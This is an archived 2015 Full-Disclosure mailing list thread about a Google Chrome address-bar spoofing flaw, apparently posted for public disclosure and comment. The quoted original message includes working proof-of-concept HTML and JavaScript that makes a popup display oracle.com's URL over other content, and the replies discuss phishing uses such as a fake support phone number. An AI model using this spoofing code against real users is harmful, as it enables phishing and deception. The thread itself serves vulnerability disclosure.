| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 2 Jul 2015 13:51:06 +0000 (UTC)
From: Big Whale <d0lph1n98@...oo.com>
To: Valentinas Bakaitis <v.bakaitis@...il.com>,
David Leo <david.leo@...sen.co.uk>
Cc: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>,
"bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>,
"oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
Subject: Re: [FD] Google Chrome Address Spoofing (Request For Comment)
Found this POC: musalbas/address-spoofing-poc
| |
| | | | | | | |
| musalbas/address-spoofing-pocaddress-spoofing-poc - Chrome address spoofing vulnerability proof-of-concept for HTTPS. (Original by David Leo.) |
| |
| View on github.com | Preview by Yahoo |
| |
| |
On Thursday, July 2, 2015 9:21 AM, Valentinas Bakaitis <v.bakaitis@...il.com> wrote:
Can you perform any actions on the page once the URL is replaced, or is it
non responsive? (asking because PoC did not work on my Chrome 43.0.2357.130
(64-bit) on OSX). If it is non responsive then the impact is very limited.
Worst thing I can think of is showing "your account is suspended, please
contact technical support on 0800-555-555" and then using the trust user
puts in the URL for phone phishing. If it is responsive, then it's indeed
pretty bad.
Cheers!
V.
On Tue, Jun 30, 2015 at 6:08 PM, David Leo <david.leo@...sen.co.uk> wrote:
> Impact:
> The "click to verify" thing is completely broken...
> Anyone can be "BBB Accredited Business" etc.
> You can make whitehouse.gov display "We love Islamic State" :-)
>
> Note:
> No user interaction on the fake page.
>
> Code:
> ***** index.html
> <script>
> function next()
> {
> w.location.replace('http://www.oracle.com/index.html?'+n);n++;
> setTimeout("next();",15);
> setTimeout("next();",25);
> }
> function f()
> {
> w=window.open("content.html","_blank","width=500 height=500");
>
> i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5);
> }
> </script>
> <a href="#" onclick="f()">Go</a><br>
> ***** content.html
> <b>This web page is NOT oracle.com</b>
> <script>location="http://www.oracle.com/index.html";</script>
> ***** It's online
> http://www.deusen.co.uk/items/gwhere.6128645971389012/
> (The page says "June/16/2015" - it works as we tested today)
>
> Request For Comment:
> We reported this to Google.
> They reproduced, and say
> It's DoS which doesn't matter.
> We think it's very strange,
> since the browser does not crash(not DoS),
> and the threat is obvious.
> What's your opinion?
>
> Kind Regards,
>
> PS
> We love clever tricks.
> We love this:
> http://dieyu.org/
>
>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists